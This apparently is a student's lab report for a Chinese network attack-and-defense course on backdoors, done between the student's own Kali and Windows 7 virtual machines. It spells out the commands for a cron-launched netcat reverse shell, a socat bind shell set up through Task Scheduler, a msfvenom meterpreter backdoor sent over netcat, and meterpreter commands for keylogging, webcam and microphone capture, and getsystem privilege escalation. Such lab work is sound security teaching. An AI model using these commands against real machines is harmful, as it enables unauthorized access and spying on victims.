2018-2019-2 网络对抗技术 20165321 Exp2 后门原理与实践
基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
答:网络钓鱼植入木马。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
答:绑定在合法软件上启动。
(3)Meterpreter有哪些给你映像深刻的功能?
答:记录按键功能,可以获取输入的密码。
(4)如何发现自己有系统有没有被安装后门?
答:用杀软杀毒。。。。。。
实验内容
(1)使用netcat获取主机操作shell,cron启动 (0.5分)
步骤/截图
- cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。详细说明可以"man cron"。
- 在Windows系统下,监听
5321
端口 - 在kali环境下,用
crontab -e
指令编辑一条定时任务,(crontab
指令增加一条定时任务,-e
表示编辑)选择编辑器时选择3
(第一次会提示选择编辑器,以后就不会提示了); - 在最后一行添加
58 * * * * /bin/netcat 169.254.175.85 5318 -e /bin/sh
,意思是在每个小时的第58分钟反向连接Windows7主机的5321端口;
- 当时间到了第58分时,Windows7获得kali的shell,可输入命令。
(2)使用socat获取主机操作shell, 任务计划启动 (0.5分)
步骤/截图
- 搜索打开“计算机管理”;
- 在“任务计划程序”中“创建任务”;
- 填写任务名->新建一个触发器;
- 在操作->程序或脚本中选择你的
socat.exe
文件的路径,在添加参数一栏填写tcp-listen:5321 exec:cmd.exe,pty,stderr
,这个命令的作用是把cmd.exe
绑定到端口5321
,同时把cmd.exe
的stderr
重定向到stdout
上;
- 创建完成之后,按
Win+L
快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行; - 此时,在kali环境下输入指令
socat - tcp:192.168.70.144:5321
,这里的第一个参数-
代表标准的输入输出,第二个流连接到Windows主机的5321
端口,此时可以发现已经成功获得了一个cmd shell。
(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)
步骤/截图
- 在kali上执行指令
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.70.145 LPORT=5321 -f exe > 20165321_backdoor.exe
,这里的IP地址为kali的IP地址,运行指令后生成了后门程序“20165318_backdoor.exe”;
- 在Windows7下执行
nc.exe -l 5321 > 20165321_backdoor.exe
,这样被控主机就进入了接收文件模式,也可以使用ncat.exe -lv 5321 > 20165321_backdoor.exe
指令,通过-lv
选项看到当前的连接状态;
- 在kali中执行
nc -nv 192.168.70.144 5321 < 20165321_backdoor.exe
,这里的IP地址为Windows7的IP地址;
- 传送接收文件成功;
- 在kali上输入`
msfconsole
指令,然后在Windows7中打开后门程序,kali中就进入msf控制台;
- 输入
use exploit/multi/handler
使用监听模块,设置payload; - 输入
set payload windows/meterpreter/reverse_tcp
,使用和生成后门程序时相同的payload; - 输入
set LHOST 192.168.70.145
,这里用的是kali的IP,和生成后门程序时指定的IP相同; - 输入
set LPORT 5321
,同样要使用相同的端口; - 输入
show options
查看设置; - 设置完成后,输入
exploit
执行监听;
- 在Windows7中运行后门程序;
- kali获得Windows7的shell。
(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)
步骤/截图
- 使用
record_mic
指令可以截获一段音频,可以用-d
选项设置录制时间; - 使用
webcam_snap
指令可以使用摄像头进行拍照; - 使用
keyscan_start
指令开始记录下击键的过程,使用keyscan_dump
指令读取击键的记录; - 使用
screenshot
指令可以进行截屏; - 先使用
getuid
指令查看当前用户,使用getsystem
指令进行提权; - 用
webcam stream
指令可以使用摄像头进行录像。
错误记录
在本次实验当中,我遇到了一些错误。
- 在第(3)步中,我在执行
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.70.145 LPORT=5321 -f exe > 20165321_backdoor.exe
生成后门程序的时候,一开始一直提示无法生成后门程序,后来才发现,原来是重新启动kali的时候,IP地址已经发生了改变,而我在输入指令的时候,还沿用的是上次开启kali的时候的IP地址,因此发生错误。 - 在第(4)步中,在虚拟机内无法启动摄像头。
实验感想
在本次实验当中,我更深刻地体验到了比在第一次实验当中更为深入、更为隐蔽、更为功能强大的后门程序所产生的威力。在第一次实验当中,攻击方对受害方攻击成功之后,仅仅只是获得了受害方主机的shell,但在第二次实验当中,攻击方向受害方注入后门程序,攻击成功之后,不仅仅可以获得受害方主机的shell,而且还可以调用受害方主机的摄像头进行拍照、录像,还可以在受害方主机上录音、截屏,甚至获取受害方主机的键盘敲击记录,功能甚是强大,也让我们了解到了恶意代码与后门程序的危害性,以让我们增强在这方面的防御。
2018-2019-2 网络对抗技术 20165321 Exp2 后门原理与实践的更多相关文章
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
- 2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165323 Exp2 后门原理与实践 一.实验要求 (3.5分) (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用soc ...
- 2018-2019-2 20165235《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165235<网络对抗技术>Exp2 后门原理与实践 实验内容 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shel ...
- 2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165311 Exp2 后门原理与实践 后门的基本概念 常用后门工具 netcat Win获得Linux Shell Linux获得Win Shell Met ...
- 2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165317 Exp2 后门原理与实践 基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 下载免费应用的时候会有绑定木马. 浏览某些网页时会有内 ...
- 2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165336 Exp2 后门原理与实践 1.基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 下载自己不熟悉的软件时含有病毒. 网络钓鱼, ...
随机推荐
- 如何在element-ui table 取到对应的ID的最后一个对象
来回切换3个状态值如何得到对应ID的最后一个对象 var is_push = () => { for (var i = 0; i < this.form.FaultDevices.leng ...
- 洛谷P4482 [BJWC2018]Border 的四种求法 字符串,SAM,线段树合并,线段树,树链剖分,DSU on Tree
原文链接https://www.cnblogs.com/zhouzhendong/p/LuoguP4482.html 题意 给定一个字符串 S,有 q 次询问,每次给定两个数 L,R ,求 S[L.. ...
- Ubuntu在终端执行命令时出现的错误
1.在安装jdk时无意间结束了安装进程,然后就提示这个错误 E: 无法获得锁 /var/lib/dpkg/lock - open (11: 资源暂时不可用)E: 无法锁定管理目录(/var/lib/d ...
- Codeforces --- 982C Cut 'em all! DFS加贪心
题目链接: https://cn.vjudge.net/problem/1576783/origin 输入输出: ExamplesinputCopy42 44 13 1outputCopy1input ...
- JavaScript(三)
函数 函数就是重复执行的代码片. 函数定义与执行 <script type="text/javascript"> // 函数定义 function aa(){ aler ...
- python#读csv,excel,json数据
#读csv,excel,json数据 with open('E:\\test\\xdd.csv','r') as f: for line in f.readlines(): print(line) i ...
- Nginx+Https自己敲命令生成证书
nginx配置https访问 一.准备 环境:centos6.8 nginx:1.13.6 二.开始 首先安装依赖包: yum install -y gcc gcc-c++ autocon ...
- spring boot 加载application配置文件
这就要注意了
- CentOS系统下安装python3+Django
转载:CentOS系统下安装python3+Django 1.首先用yum安装下vim,因为CentOS 7可能根本没自带完整vim,经常出现输入乱码:yum -y install vim 2.安装开 ...
- vs代码模板制作
VS2008代码模板制作 一,类模板制作: 路径:C:\Program Files (x86)\Microsoft Visual Studio 9.0\Common7\IDE\ItemTemplate ...